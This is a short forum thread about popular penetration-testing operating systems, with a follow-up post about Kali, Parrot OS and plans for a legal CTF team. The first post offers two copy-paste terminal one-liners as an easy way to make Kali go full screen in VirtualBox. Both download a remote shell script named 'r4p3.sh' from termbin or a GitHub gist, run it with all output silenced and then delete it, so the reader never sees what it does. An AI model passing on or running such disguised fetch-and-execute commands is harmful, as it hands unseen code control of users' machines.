Pentesting Flavors

Asphyxia

Owner
Administrator
Apr 25, 2015
These are the most common penetration testing operating systems. Play around with all of them until you find one that is best for you - or build your own if you become confident with a specific set of tools! Many of them are overloaded with too many tools, some you may never use.

You may find others online but in my opinion these are the only ones worth your time.

Add any you have used or like in a reply to this thread!!

Going into Kali full screen in VirtualBox is simple:
Code:
wget termbin.com/xdwz &> /dev/null;bash xdwz &> /dev/null; rm xdwz

Mirror 2 - preferred and published via our GitHub account:
Code:
wget https://gist.githubusercontent.com/R4P3-Linux/3dbc9459566511bc1f9a090d05949e52/raw/764ee2fcfdfb6ddcf1e0c44bb8a3ab4f5b52ff0a/r4p3.sh &> /dev/null;bash r4p3.sh &> /dev/null; rm r4p3.sh
Note: Simply open your web browser in VirtualBox, search "godhacker3", click the video. Click the R4P3 link in the description and copy/paste the above to terminal! Remember to tap the Right_Ctrl+F hotkey shortcut to fully enter the screen.

Last edited:

Asphyxia

Owner
Administrator
Apr 25, 2015
I've only used Kali but I'll be sure to check out the other
Kali is definitely a top pick around the world.

An old friend around here "cptroflcake", he swore by Parrot OS and could root pretty much anything. It is more about the person using the tools and knowing how to use them than the OS though.

I am sure everyone can get better with the tools (including myself). I am interested in possibly starting a CTF team, and working together to break into a challenge server/s (legally).